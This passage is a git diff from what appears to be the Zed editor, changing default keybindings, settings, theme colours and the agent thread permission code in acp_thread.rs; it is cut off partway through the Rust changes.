--git a/assets/icons/workspace_nav_closed.svg b/assets/icons/workspace_nav_closed.svg deleted file mode 100644 index ed1fce52d6826a4d10299f331358ff84e4caa973..0000000000000000000000000000000000000000 --- a/assets/icons/workspace_nav_closed.svg +++ /dev/null @@ -1,5 +0,0 @@ - - - - - diff --git a/assets/icons/workspace_nav_open.svg b/assets/icons/workspace_nav_open.svg deleted file mode 100644 index 464b6aac73c2aeaa9463a805aabc4559377bbfd3..0000000000000000000000000000000000000000 --- a/assets/icons/workspace_nav_open.svg +++ /dev/null @@ -1,5 +0,0 @@ - - - - - diff --git a/assets/keymaps/default-linux.json b/assets/keymaps/default-linux.json index cb5cef24c50f9f9ac637f3ac70adb24d37e56d61..9e7e483e9d8ce245fa34bad55073a59ffe77759a 100644 --- a/assets/keymaps/default-linux.json +++ b/assets/keymaps/default-linux.json @@ -31,7 +31,6 @@ "ctrl-+": ["zed::IncreaseBufferFontSize", { "persist": false }], "ctrl--": ["zed::DecreaseBufferFontSize", { "persist": false }], "ctrl-0": ["zed::ResetBufferFontSize", { "persist": false }], - "ctrl-,": "zed::OpenSettings", "ctrl-alt-,": "zed::OpenSettingsFile", "ctrl-q": "zed::Quit", "f4": "debugger::Start", @@ -226,8 +225,8 @@ "context": "ContextEditor > Editor", "bindings": { "ctrl-enter": "assistant::Assist", - "ctrl-s": "workspace::Save", "save": "workspace::Save", + "ctrl-s": "workspace::Save", "ctrl-<": "assistant::InsertIntoEditor", "shift-enter": "assistant::Split", "ctrl-r": "assistant::CycleMessageRole", @@ -258,7 +257,7 @@ "ctrl-shift-j": "agent::ToggleNavigationMenu", "ctrl-alt-i": "agent::ToggleOptionsMenu", "ctrl-alt-shift-n": "agent::ToggleNewThreadMenu", - "ctrl-alt-shift-t": "agent::ToggleStartThreadInSelector", + "ctrl-shift-t": "agent::CycleStartThreadIn", "shift-alt-escape": "agent::ExpandMessageEditor", "ctrl->": "agent::AddSelectionToThread", "ctrl-shift-e": "project_panel::ToggleFocus", @@ -391,6 +390,14 @@ "ctrl-enter": "search::ReplaceAll", }, }, + { + "context": "BufferSearchBar && !in_replace > Editor", + "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + "shift-enter": "search::SelectPreviousMatch", + }, + }, { "context": "BufferSearchBar && !in_replace > Editor", "bindings": { @@ -424,6 +431,12 @@ "ctrl-alt-enter": "search::ReplaceAll", }, }, + { + "context": "ProjectSearchBar && !in_replace > Editor", + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchView", "bindings": { @@ -624,6 +637,7 @@ "ctrl-shift-t": "pane::ReopenClosedItem", "ctrl-k ctrl-s": "zed::OpenKeymap", "ctrl-k ctrl-t": "theme_selector::Toggle", + "ctrl-k ctrl-shift-t": "theme::ToggleMode", "ctrl-alt-super-p": "settings_profile_selector::Toggle", "ctrl-t": "project_symbols::Toggle", "ctrl-p": "file_finder::Toggle", @@ -670,13 +684,17 @@ }, }, { - "context": "WorkspaceSidebar", + "context": "ThreadsSidebar", "use_key_equivalents": true, "bindings": { - "ctrl-n": "multi_workspace::NewWorkspaceInWindow", - "left": "agents_sidebar::CollapseSelectedEntry", - "right": "agents_sidebar::ExpandSelectedEntry", + "ctrl-n": "agents_sidebar::NewThreadInGroup", + "left": "menu::SelectParent", + "right": "menu::SelectChild", "enter": "menu::Confirm", + "space": "menu::Confirm", + "ctrl-f": "agents_sidebar::FocusSidebarFilter", + "ctrl-g": "agents_sidebar::ToggleArchive", + "shift-backspace": "agent::RemoveSelectedThread", }, }, { @@ -766,18 +784,14 @@ "bindings": { "alt-tab": "editor::AcceptEditPrediction", "alt-l": "editor::AcceptEditPrediction", - "tab": "editor::AcceptEditPrediction", "alt-k": "editor::AcceptNextWordEditPrediction", "alt-j": "editor::AcceptNextLineEditPrediction", }, }, { - "context": "Editor && edit_prediction_conflict", + "context": "Editor && edit_prediction && edit_prediction_mode == eager", "bindings": { - "alt-tab": "editor::AcceptEditPrediction", - "alt-l": "editor::AcceptEditPrediction", - "alt-k": "editor::AcceptNextWordEditPrediction", - "alt-j": "editor::AcceptNextLineEditPrediction", + "tab": "editor::AcceptEditPrediction", }, }, { @@ -895,6 +909,8 @@ "ctrl-alt-c": "project_panel::CopyPath", "alt-shift-copy": "workspace::CopyRelativePath", "alt-ctrl-shift-c": "workspace::CopyRelativePath", + "undo": "project_panel::Undo", + "ctrl-z": "project_panel::Undo", "enter": "project_panel::Rename", "f2": "project_panel::Rename", "backspace": ["project_panel::Trash", { "skip_prompt": false }], @@ -1232,6 +1248,8 @@ "down": "markdown::ScrollDown", "alt-up": "markdown::ScrollUpByItem", "alt-down": "markdown::ScrollDownByItem", + "ctrl-home": "markdown::ScrollToTop", + "ctrl-end": "markdown::ScrollToBottom", }, }, { @@ -1320,6 +1338,15 @@ "ctrl-shift-backspace": "git::DeleteWorktree", }, }, + { + // Handled under a more specific context to avoid conflicts with the + // `OpenCurrentFile` keybind from the settings UI + "context": "!SettingsWindow", + "use_key_equivalents": true, + "bindings": { + "ctrl-,": "zed::OpenSettings", + } + }, { "context": "SettingsWindow", "use_key_equivalents": true, @@ -1437,8 +1464,8 @@ { "context": "GitPicker", "bindings": { - "alt-1": "git_picker::ActivateBranchesTab", - "alt-2": "git_picker::ActivateWorktreesTab", + "alt-1": "git_picker::ActivateWorktreesTab", + "alt-2": "git_picker::ActivateBranchesTab", "alt-3": "git_picker::ActivateStashTab", }, }, diff --git a/assets/keymaps/default-macos.json b/assets/keymaps/default-macos.json index 08fb63868be875f41f6c461354b46f1081a2026f..8c7acbf6b48c924d13e381e2fb08ad3641ed483e 100644 --- a/assets/keymaps/default-macos.json +++ b/assets/keymaps/default-macos.json @@ -39,7 +39,6 @@ "cmd-+": ["zed::IncreaseBufferFontSize", { "persist": false }], "cmd--": ["zed::DecreaseBufferFontSize", { "persist": false }], "cmd-0": ["zed::ResetBufferFontSize", { "persist": false }], - "cmd-,": "zed::OpenSettings", "cmd-alt-,": "zed::OpenSettingsFile", "cmd-q": "zed::Quit", "cmd-h": "zed::Hide", @@ -297,7 +296,7 @@ "cmd-shift-j": "agent::ToggleNavigationMenu", "cmd-alt-m": "agent::ToggleOptionsMenu", "cmd-alt-shift-n": "agent::ToggleNewThreadMenu", - "cmd-alt-shift-t": "agent::ToggleStartThreadInSelector", + "cmd-shift-t": "agent::CycleStartThreadIn", "shift-alt-escape": "agent::ExpandMessageEditor", "cmd->": "agent::AddSelectionToThread", "cmd-shift-e": "project_panel::ToggleFocus", @@ -446,6 +445,13 @@ { "context": "BufferSearchBar && !in_replace > Editor", "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + "shift-enter": "search::SelectPreviousMatch", + }, + }, + { + "context": "BufferSearchBar && !in_replace > Editor", "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -473,7 +479,6 @@ }, { "context": "ProjectSearchBar > Editor", - "use_key_equivalents": true, "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -487,6 +492,12 @@ "cmd-enter": "search::ReplaceAll", }, }, + { + "context": "ProjectSearchBar && !in_replace > Editor", + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchView", "use_key_equivalents": true, @@ -691,6 +702,7 @@ "cmd-shift-t": "pane::ReopenClosedItem", "cmd-k cmd-s": "zed::OpenKeymap", "cmd-k cmd-t": "theme_selector::Toggle", + "cmd-k cmd-shift-t": "theme::ToggleMode", "ctrl-alt-cmd-p": "settings_profile_selector::Toggle", "cmd-t": "project_symbols::Toggle", "cmd-p": "file_finder::Toggle", @@ -738,13 +750,17 @@ }, }, { - "context": "WorkspaceSidebar", + "context": "ThreadsSidebar", "use_key_equivalents": true, "bindings": { - "cmd-n": "multi_workspace::NewWorkspaceInWindow", - "left": "agents_sidebar::CollapseSelectedEntry", - "right": "agents_sidebar::ExpandSelectedEntry", + "cmd-n": "agents_sidebar::NewThreadInGroup", + "left": "menu::SelectParent", + "right": "menu::SelectChild", "enter": "menu::Confirm", + "space": "menu::Confirm", + "cmd-f": "agents_sidebar::FocusSidebarFilter", + "cmd-g": "agents_sidebar::ToggleArchive", + "shift-backspace": "agent::RemoveSelectedThread", }, }, { @@ -830,18 +846,14 @@ "context": "Editor && edit_prediction", "bindings": { "alt-tab": "editor::AcceptEditPrediction", - "tab": "editor::AcceptEditPrediction", "ctrl-cmd-right": "editor::AcceptNextWordEditPrediction", "ctrl-cmd-down": "editor::AcceptNextLineEditPrediction", }, }, { - "context": "Editor && edit_prediction_conflict", - "use_key_equivalents": true, + "context": "Editor && edit_prediction && edit_prediction_mode == eager", "bindings": { - "alt-tab": "editor::AcceptEditPrediction", - "ctrl-cmd-right": "editor::AcceptNextWordEditPrediction", - "ctrl-cmd-down": "editor::AcceptNextLineEditPrediction", + "tab": "editor::AcceptEditPrediction", }, }, { @@ -956,6 +968,7 @@ "cmd-v": "project_panel::Paste", "cmd-alt-c": "workspace::CopyPath", "alt-cmd-shift-c": "workspace::CopyRelativePath", + "cmd-z": "project_panel::Undo", "enter": "project_panel::Rename", "f2": "project_panel::Rename", "backspace": ["project_panel::Trash", { "skip_prompt": false }], @@ -1338,6 +1351,8 @@ "down": "markdown::ScrollDown", "alt-up": "markdown::ScrollUpByItem", "alt-down": "markdown::ScrollDownByItem", + "cmd-up": "markdown::ScrollToTop", + "cmd-down": "markdown::ScrollToBottom", }, }, { @@ -1425,6 +1440,15 @@ "cmd-shift-backspace": "git::DeleteWorktree", }, }, + { + // Handled under a more specific context to avoid conflicts with the + // `OpenCurrentFile` keybind from the settings UI + "context": "!SettingsWindow", + "use_key_equivalents": true, + "bindings": { + "cmd-,": "zed::OpenSettings", + } + }, { "context": "SettingsWindow", "use_key_equivalents": true, @@ -1515,8 +1539,8 @@ { "context": "GitPicker", "bindings": { - "cmd-1": "git_picker::ActivateBranchesTab", - "cmd-2": "git_picker::ActivateWorktreesTab", + "cmd-1": "git_picker::ActivateWorktreesTab", + "cmd-2": "git_picker::ActivateBranchesTab", "cmd-3": "git_picker::ActivateStashTab", }, }, diff --git a/assets/keymaps/default-windows.json b/assets/keymaps/default-windows.json index 600025e2069978f3020afb5cb978d05a53317682..92dff9743c3fdfcabab9e217cfbfd39b3f07f75a 100644 --- a/assets/keymaps/default-windows.json +++ b/assets/keymaps/default-windows.json @@ -30,7 +30,6 @@ "ctrl-shift-=": ["zed::IncreaseBufferFontSize", { "persist": false }], "ctrl--": ["zed::DecreaseBufferFontSize", { "persist": false }], "ctrl-0": ["zed::ResetBufferFontSize", { "persist": false }], - "ctrl-,": "zed::OpenSettings", "ctrl-alt-,": "zed::OpenSettingsFile", "ctrl-q": "zed::Quit", "f4": "debugger::Start", @@ -259,7 +258,7 @@ "shift-alt-j": "agent::ToggleNavigationMenu", "shift-alt-i": "agent::ToggleOptionsMenu", "ctrl-shift-alt-n": "agent::ToggleNewThreadMenu", - "ctrl-shift-alt-t": "agent::ToggleStartThreadInSelector", + "ctrl-shift-t": "agent::CycleStartThreadIn", "shift-alt-escape": "agent::ExpandMessageEditor", "ctrl-shift-.": "agent::AddSelectionToThread", "ctrl-shift-e": "project_panel::ToggleFocus", @@ -398,6 +397,13 @@ { "context": "BufferSearchBar && !in_replace > Editor", "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + "shift-enter": "search::SelectPreviousMatch", + }, + }, + { + "context": "BufferSearchBar && !in_replace > Editor", "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -415,7 +421,6 @@ }, { "context": "ProjectSearchBar > Editor", - "use_key_equivalents": true, "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -429,6 +434,12 @@ "ctrl-alt-enter": "search::ReplaceAll", }, }, + { + "context": "ProjectSearchBar && !in_replace > Editor", + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchView", "use_key_equivalents": true, @@ -616,6 +627,7 @@ "ctrl-shift-t": "pane::ReopenClosedItem", "ctrl-k ctrl-s": "zed::OpenKeymap", "ctrl-k ctrl-t": "theme_selector::Toggle", + "ctrl-k ctrl-shift-t": "theme::ToggleMode", "ctrl-alt-super-p": "settings_profile_selector::Toggle", "ctrl-t": "project_symbols::Toggle", "ctrl-p": "file_finder::Toggle", @@ -674,13 +686,17 @@ }, }, { - "context": "WorkspaceSidebar", + "context": "ThreadsSidebar", "use_key_equivalents": true, "bindings": { - "ctrl-n": "multi_workspace::NewWorkspaceInWindow", - "left": "agents_sidebar::CollapseSelectedEntry", - "right": "agents_sidebar::ExpandSelectedEntry", + "ctrl-n": "agents_sidebar::NewThreadInGroup", + "left": "menu::SelectParent", + "right": "menu::SelectChild", "enter": "menu::Confirm", + "space": "menu::Confirm", + "ctrl-f": "agents_sidebar::FocusSidebarFilter", + "ctrl-g": "agents_sidebar::ToggleArchive", + "shift-backspace": "agent::RemoveSelectedThread", }, }, { @@ -762,19 +778,15 @@ "bindings": { "alt-tab": "editor::AcceptEditPrediction", "alt-l": "editor::AcceptEditPrediction", - "tab": "editor::AcceptEditPrediction", "alt-k": "editor::AcceptNextWordEditPrediction", "alt-j": "editor::AcceptNextLineEditPrediction", }, }, { - "context": "Editor && edit_prediction_conflict", + "context": "Editor && edit_prediction && edit_prediction_mode == eager", "use_key_equivalents": true, "bindings": { - "alt-tab": "editor::AcceptEditPrediction", - "alt-l": "editor::AcceptEditPrediction", - "alt-k": "editor::AcceptNextWordEditPrediction", - "alt-j": "editor::AcceptNextLineEditPrediction", + "tab": "editor::AcceptEditPrediction", }, }, { @@ -893,6 +905,7 @@ "ctrl-v": "project_panel::Paste", "shift-alt-c": "project_panel::CopyPath", "ctrl-k ctrl-shift-c": "workspace::CopyRelativePath", + "ctrl-z": "project_panel::Undo", "enter": "project_panel::Rename", "f2": "project_panel::Rename", "backspace": ["project_panel::Trash", { "skip_prompt": false }], @@ -1261,6 +1274,8 @@ "down": "markdown::ScrollDown", "alt-up": "markdown::ScrollUpByItem", "alt-down": "markdown::ScrollDownByItem", + "ctrl-home": "markdown::ScrollToTop", + "ctrl-end": "markdown::ScrollToBottom", }, }, { @@ -1341,6 +1356,15 @@ "ctrl-shift-backspace": "git::DeleteWorktree", }, }, + { + // Handled under a more specific context to avoid conflicts with the + // `OpenCurrentFile` keybind from the settings UI + "context": "!SettingsWindow", + "use_key_equivalents": true, + "bindings": { + "ctrl-,": "zed::OpenSettings", + } + }, { "context": "SettingsWindow", "use_key_equivalents": true, @@ -1430,8 +1454,8 @@ { "context": "GitPicker", "bindings": { - "alt-1": "git_picker::ActivateBranchesTab", - "alt-2": "git_picker::ActivateWorktreesTab", + "alt-1": "git_picker::ActivateWorktreesTab", + "alt-2": "git_picker::ActivateBranchesTab", "alt-3": "git_picker::ActivateStashTab", }, }, diff --git a/assets/keymaps/macos/jetbrains.json b/assets/keymaps/macos/jetbrains.json index 8612e07c4719dfdbf67762c89505cc2da0cfa000..304ffb86e8c2fd08fb756b015490f8c4ac424f58 100644 --- a/assets/keymaps/macos/jetbrains.json +++ b/assets/keymaps/macos/jetbrains.json @@ -33,6 +33,7 @@ "cmd-+": "editor::UnfoldLines", "alt-shift-g": "editor::SplitSelectionIntoLines", "ctrl-g": ["editor::SelectNext", { "replace_newest": false }], + "ctrl-shift-g": "editor::UndoSelection", "ctrl-cmd-g": ["editor::SelectPrevious", { "replace_newest": false }], "cmd-/": ["editor::ToggleComments", { "advance_downwards": true }], "alt-up": "editor::SelectLargerSyntaxNode", diff --git a/assets/keymaps/vim.json b/assets/keymaps/vim.json index 1f2742f982bc2165181a797e577b350f5630def9..6d1a0cf278d5eb7598ed92e91b7d4ffad90d9c05 100644 --- a/assets/keymaps/vim.json +++ b/assets/keymaps/vim.json @@ -427,6 +427,7 @@ "escape": "vim::SwitchToHelixNormalMode", "i": "vim::HelixInsert", "a": "vim::HelixAppend", + "shift-a": "vim::HelixInsertEndOfLine", "ctrl-[": "editor::Cancel", }, }, @@ -510,8 +511,8 @@ "g shift-u": "git::UnstageAndNext", // Zed specific // Window mode - "space w v": "pane::SplitDown", - "space w s": "pane::SplitRight", + "space w v": "pane::SplitRight", + "space w s": "pane::SplitDown", "space w h": "workspace::ActivatePaneLeft", "space w j": "workspace::ActivatePaneDown", "space w k": "workspace::ActivatePaneUp", @@ -1059,7 +1060,7 @@ }, }, { - "context": "Editor && edit_prediction", + "context": "Editor && edit_prediction && edit_prediction_mode == eager", "bindings": { // This is identical to the binding in the base keymap, but the vim bindings above to // "vim::Tab" shadow it, so it needs to be bound again. @@ -1072,15 +1073,7 @@ "enter": "agent::Chat", }, }, - { - "context": "os != macos && Editor && edit_prediction_conflict", - "bindings": { - // alt-l is provided as an alternative to tab/alt-tab. and will be displayed in the UI. This - // is because alt-tab may not be available, as it is often used for window switching on Linux - // and Windows. - "alt-l": "editor::AcceptEditPrediction", - }, - }, + { "context": "SettingsWindow > NavigationMenu && !search", "bindings": { @@ -1099,6 +1092,8 @@ "ctrl-d": "markdown::ScrollPageDown", "ctrl-y": "markdown::ScrollUp", "ctrl-e": "markdown::ScrollDown", + "g g": "markdown::ScrollToTop", + "shift-g": "markdown::ScrollToBottom", }, }, { @@ -1118,4 +1113,31 @@ "k": "notebook::NotebookMoveUp", }, }, + { + "context": "ThreadsSidebar && !Editor", + "bindings": { + "j": "menu::SelectNext", + "k": "menu::SelectPrevious", + "h": "menu::SelectParent", + "l": "menu::SelectChild", + "g g": "menu::SelectFirst", + "shift-g": "menu::SelectLast", + "/": "agents_sidebar::FocusSidebarFilter", + "z a": "editor::ToggleFold", + "z c": "menu::SelectParent", + "z o": "menu::SelectChild", + "z shift-m": "editor::FoldAll", + "z shift-r": "editor::UnfoldAll", + }, + }, + { + "context": "ThreadsSidebar > Editor && VimControl && vim_mode == normal", + "bindings": { + "j": "editor::MoveDown", + "k": "editor::MoveUp", + "/": "vim::SwitchToInsertMode", + "escape": "menu::Cancel", + "enter": "editor::Newline", + }, + }, ] diff --git a/assets/settings/default.json b/assets/settings/default.json index 0a824bbe93a0d68a23d934a63eb1fdab1e2f1b02..05d9b592979f19184f6e1b9b9cd6c7b02c603ca1 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -460,12 +460,10 @@ "show_sign_in": true, // Whether to show the menus in the titlebar. "show_menus": false, + // The layout of window control buttons in the title bar (Linux only). + "button_layout": "platform_default", }, "audio": { - // Opt into the new audio system. - "experimental.rodio_audio": false, - // Requires 'rodio_audio: true' - // // Automatically increase or decrease you microphone's volume. This affects how // loud you sound to others. // @@ -474,33 +472,10 @@ // audio and has auto speaker volume on this will make you very loud // compared to other speakers. "experimental.auto_microphone_volume": false, - // Requires 'rodio_audio: true' - // - // Automatically increate or decrease the volume of other call members. - // This only affects how things sound for you. - "experimental.auto_speaker_volume": true, - // Requires 'rodio_audio: true' - // - // Remove background noises. Works great for typing, cars, dogs, AC. Does - // not work well on music. - "experimental.denoise": true, - // Requires 'rodio_audio: true' - // - // Use audio parameters compatible with the previous versions of - // experimental audio and non-experimental audio. When this is false you - // will sound strange to anyone not on the latest experimental audio. In - // the future we will migrate by setting this to false - // - // You need to rejoin a call for this setting to apply - "experimental.legacy_audio_compatible": true, - // Requires 'rodio_audio: true' - // // Select specific output audio device. // `null` means use system default. // Any unrecognized output device will fall back to system default. "experimental.output_audio_device": null, - // Requires 'rodio_audio: true' - // // Select specific input audio device. // `null` means use system default. // Any unrecognized input device will fall back to system default. @@ -768,6 +743,9 @@ // 5. Never show the scrollbar: // "never" "show": null, + // Whether to allow horizontal scrolling in the project panel. + // When false, the view is locked to the leftmost position and long file names are clipped. + "horizontal_scroll": true, }, // Which files containing diagnostic errors/warnings to mark in the project panel. // This setting can take the following three values: @@ -895,6 +873,14 @@ // Choices: label_color, icon // Default: icon "status_style": "icon", + // Whether to show file icons in the git panel. + // + // Default: false + "file_icons": false, + // Whether to show folder icons or chevrons for directories in the git panel. + // + // Default: true + "folder_icons": true, // What branch name to use if `init.defaultBranch` is not set // // Default: main @@ -911,6 +897,14 @@ /// /// Default: false "tree_view": false, + // Whether the git panel should open on startup. + // + // Default: false + "starts_open": false, + // Whether to show a badge on the git panel icon with the count of uncommitted changes. + // + // Default: false + "show_count_badge": false, "scrollbar": { // When to show the scrollbar in the git panel. // @@ -920,8 +914,8 @@ }, // Whether to show the addition/deletion change count next to each file in the Git panel. // - // Default: false - "diff_stats": false, + // Default: true + "diff_stats": true, }, "message_editor": { // Whether to automatically replace emoji shortcodes with emoji characters. @@ -935,6 +929,8 @@ "dock": "right", // Default width of the notification panel. "default_width": 380, + // Whether to show a badge on the notification panel icon with the count of unread notifications. + "show_count_badge": false, }, "agent": { // Whether the inline assistant should use streaming tools, when available @@ -1052,6 +1048,7 @@ "spawn_agent": true, "terminal": true, "thinking": true, + "update_plan": true, "web_search": true, }, }, @@ -1071,6 +1068,7 @@ "grep": true, "spawn_agent": true, "thinking": true, + "update_plan": true, "web_search": true, }, }, @@ -1080,6 +1078,10 @@ "tools": {}, }, }, + // Whether to start a new thread in the current local project or in a new Git worktree. + // + // Default: local_project + "new_thread_location": "local_project", // Where to show notifications when the agent has either completed // its response, or else needs confirmation before it can run a // tool action. @@ -1282,6 +1284,8 @@ // * "indexed": Use only the files Zed had indexed // * "smart": Be smart and search for ignored when called from a gitignored worktree "include_ignored": "smart", + // Whether to include text channels in file finder results. + "include_channels": false, }, // Whether or not to remove any trailing whitespace from lines of a buffer // before saving it. @@ -1850,6 +1854,8 @@ // Timeout for hover and Cmd-click path hyperlink discovery in milliseconds. Specifying a // timeout of `0` will disable path hyperlinking in terminal. "path_hyperlink_timeout_ms": 1, + // Whether to show a badge on the terminal panel icon with the count of open terminals. + "show_count_badge": false, }, "code_actions_on_format": {}, // Settings related to running tasks. @@ -2143,7 +2149,7 @@ }, }, "Starlark": { - "language_servers": ["starpls", "!buck2-lsp", "..."], + "language_servers": ["starpls", "!buck2-lsp", "!tilt", "..."], }, "Svelte": { "language_servers": ["svelte-language-server", "..."], @@ -2214,6 +2220,9 @@ "api_url": "https://api.openai.com/v1", }, "openai_compatible": {}, + "opencode": { + "api_url": "https://opencode.ai/zen", + }, "open_router": { "api_url": "https://openrouter.ai/api/v1", }, diff --git a/assets/settings/default_semantic_token_rules.json b/assets/settings/default_semantic_token_rules.json index 65b20a7423aef3c3221f9f80e345fd503627d98d..c070a253d3065feff6647123b5f687e94f5e85d6 100644 --- a/assets/settings/default_semantic_token_rules.json +++ b/assets/settings/default_semantic_token_rules.json @@ -119,6 +119,16 @@ "style": ["type"], }, // References + { + "token_type": "parameter", + "token_modifiers": ["declaration"], + "style": ["variable.parameter"] + }, + { + "token_type": "parameter", + "token_modifiers": ["definition"], + "style": ["variable.parameter"] + }, { "token_type": "parameter", "token_modifiers": [], @@ -201,6 +211,11 @@ "token_modifiers": [], "style": ["comment"], }, + { + "token_type": "string", + "token_modifiers": ["documentation"], + "style": ["string.doc"], + }, { "token_type": "string", "token_modifiers": [], diff --git a/assets/settings/initial_tasks.json b/assets/settings/initial_tasks.json index 5bedafbd3a1e75a755598e37cd673742e146fdcc..0d6f4471320e443f3c4a483f53f6901c76e7dc72 100644 --- a/assets/settings/initial_tasks.json +++ b/assets/settings/initial_tasks.json @@ -48,6 +48,11 @@ "show_summary": true, // Whether to show the command line in the output of the spawned task, defaults to `true`. "show_command": true, + // Which edited buffers to save before running the task: + // * `all` — save all edited buffers + // * `current` — save current buffer only + // * `none` — don't save any buffers + "save": "all", // Represents the tags for inline runnable indicators, or spawning multiple tasks at once. // "tags": [] }, diff --git a/assets/themes/ayu/ayu.json b/assets/themes/ayu/ayu.json index e2b7c3c91fca46ab0e4064719bea5c8793faaccc..3450e35bf62d780bdaf0cff2c6bc9f8bdfea7c1e 100644 --- a/assets/themes/ayu/ayu.json +++ b/assets/themes/ayu/ayu.json @@ -71,31 +71,31 @@ "terminal.background": "#0d1016ff", "terminal.foreground": "#bfbdb6ff", "terminal.bright_foreground": "#bfbdb6ff", - "terminal.dim_foreground": "#0d1016ff", + "terminal.dim_foreground": "#85847fff", "terminal.ansi.black": "#0d1016ff", "terminal.ansi.bright_black": "#545557ff", - "terminal.ansi.dim_black": "#bfbdb6ff", + "terminal.ansi.dim_black": "#3a3b3cff", "terminal.ansi.red": "#ef7177ff", "terminal.ansi.bright_red": "#83353bff", - "terminal.ansi.dim_red": "#febab9ff", + "terminal.ansi.dim_red": "#a74f53ff", "terminal.ansi.green": "#aad84cff", "terminal.ansi.bright_green": "#567627ff", - "terminal.ansi.dim_green": "#d8eca8ff", + "terminal.ansi.dim_green": "#769735ff", "terminal.ansi.yellow": "#feb454ff", "terminal.ansi.bright_yellow": "#92582bff", - "terminal.ansi.dim_yellow": "#ffd9aaff", + "terminal.ansi.dim_yellow": "#b17d3aff", "terminal.ansi.blue": "#5ac1feff", "terminal.ansi.bright_blue": "#27618cff", - "terminal.ansi.dim_blue": "#b7dffeff", + "terminal.ansi.dim_blue": "#3e87b1ff", "terminal.ansi.magenta": "#39bae5ff", "terminal.ansi.bright_magenta": "#205a78ff", - "terminal.ansi.dim_magenta": "#addcf3ff", + "terminal.ansi.dim_magenta": "#2782a0ff", "terminal.ansi.cyan": "#95e5cbff", "terminal.ansi.bright_cyan": "#4c806fff", - "terminal.ansi.dim_cyan": "#cbf2e4ff", + "terminal.ansi.dim_cyan": "#68a08eff", "terminal.ansi.white": "#bfbdb6ff", "terminal.ansi.bright_white": "#fafafaff", - "terminal.ansi.dim_white": "#787876ff", + "terminal.ansi.dim_white": "#85847fff", "link_text.hover": "#5ac1feff", "conflict": "#feb454ff", "conflict.background": "#572815ff", @@ -855,31 +855,31 @@ "terminal.background": "#242835ff", "terminal.foreground": "#cccac2ff", "terminal.bright_foreground": "#cccac2ff", - "terminal.dim_foreground": "#242835ff", + "terminal.dim_foreground": "#8e8d87ff", "terminal.ansi.black": "#242835ff", "terminal.ansi.bright_black": "#67696eff", - "terminal.ansi.dim_black": "#cccac2ff", + "terminal.ansi.dim_black": "#48494dff", "terminal.ansi.red": "#f18779ff", "terminal.ansi.bright_red": "#833f3cff", - "terminal.ansi.dim_red": "#fec4baff", + "terminal.ansi.dim_red": "#a85e54ff", "terminal.ansi.green": "#d5fe80ff", "terminal.ansi.bright_green": "#75993cff", - "terminal.ansi.dim_green": "#ecffc1ff", + "terminal.ansi.dim_green": "#95b159ff", "terminal.ansi.yellow": "#fecf72ff", "terminal.ansi.bright_yellow": "#937237ff", - "terminal.ansi.dim_yellow": "#ffe7b9ff", + "terminal.ansi.dim_yellow": "#b1904fff", "terminal.ansi.blue": "#72cffeff", "terminal.ansi.bright_blue": "#336d8dff", - "terminal.ansi.dim_blue": "#c1e7ffff", + "terminal.ansi.dim_blue": "#4f90b1ff", "terminal.ansi.magenta": "#5bcde5ff", "terminal.ansi.bright_magenta": "#2b6c7bff", - "terminal.ansi.dim_magenta": "#b7e7f2ff", + "terminal.ansi.dim_magenta": "#3f8fa0ff", "terminal.ansi.cyan": "#95e5cbff", "terminal.ansi.bright_cyan": "#4c806fff", - "terminal.ansi.dim_cyan": "#cbf2e4ff", + "terminal.ansi.dim_cyan": "#68a08eff", "terminal.ansi.white": "#cccac2ff", "terminal.ansi.bright_white": "#fafafaff", - "terminal.ansi.dim_white": "#898a8aff", + "terminal.ansi.dim_white": "#8e8d87ff", "link_text.hover": "#72cffeff", "conflict": "#fecf72ff", "conflict.background": "#574018ff", diff --git a/crates/acp_thread/src/acp_thread.rs b/crates/acp_thread/src/acp_thread.rs index 58252eaddca553eb1da4c960a829a88afb9eb497..e11d86196ec6367ee6d2ded709c3ba9e100da514 100644 --- a/crates/acp_thread/src/acp_thread.rs +++ b/crates/acp_thread/src/acp_thread.rs @@ -31,6 +31,8 @@ use task::{Shell, ShellBuilder}; pub use terminal::*; use text::Bias; use ui::App; +use util::markdown::MarkdownEscaped; +use util::path_list::PathList; use util::{ResultExt, get_default_system_shell_preferring_bash, paths::PathStyle}; use uuid::Uuid; @@ -245,6 +247,8 @@ impl ToolCall { ) -> Result { let title = if tool_call.kind == acp::ToolKind::Execute { tool_call.title + } else if tool_call.kind == acp::ToolKind::Edit { + MarkdownEscaped(tool_call.title.as_str()).to_string() } else if let Some((first_line, _)) = tool_call.title.split_once("\n") { first_line.to_owned() + "…" } else { @@ -333,6 +337,8 @@ impl ToolCall { self.label.update(cx, |label, cx| { if self.kind == acp::ToolKind::Execute { label.replace(title, cx); + } else if self.kind == acp::ToolKind::Edit { + label.replace(MarkdownEscaped(&title).to_string(), cx) } else if let Some((first_line, _)) = title.split_once("\n") { label.replace(first_line.to_owned() + "…", cx); } else { @@ -488,6 +494,54 @@ impl From<&ResolvedLocation> for AgentLocation { } } +#[derive(Debug, Clone)] +pub enum SelectedPermissionParams { + Terminal { patterns: Vec }, +} + +#[derive(Debug)] +pub struct SelectedPermissionOutcome { + pub option_id: acp::PermissionOptionId, + pub option_kind: acp::PermissionOptionKind, + pub params: Option, +} + +impl SelectedPermissionOutcome { + pub fn new(option_id: acp::PermissionOptionId, option_kind: acp::PermissionOptionKind) -> Self { + Self { + option_id, + option_kind, + params: None, + } + } + + pub fn params(mut self, params: Option) -> Self { + self.params = params; + self + } +} + +impl From for acp::SelectedPermissionOutcome { + fn from(value: SelectedPermissionOutcome) -> Self { + Self::new(value.option_id) + } +} + +#[derive(Debug)] +pub enum RequestPermissionOutcome { + Cancelled, + Selected(SelectedPermissionOutcome), +} + +impl From for acp::RequestPermissionOutcome { + fn from(value: RequestPermissionOutcome) -> Self { + match value { + RequestPermissionOutcome::Cancelled => Self::Cancelled, + RequestPermissionOutcome::Selected(outcome) 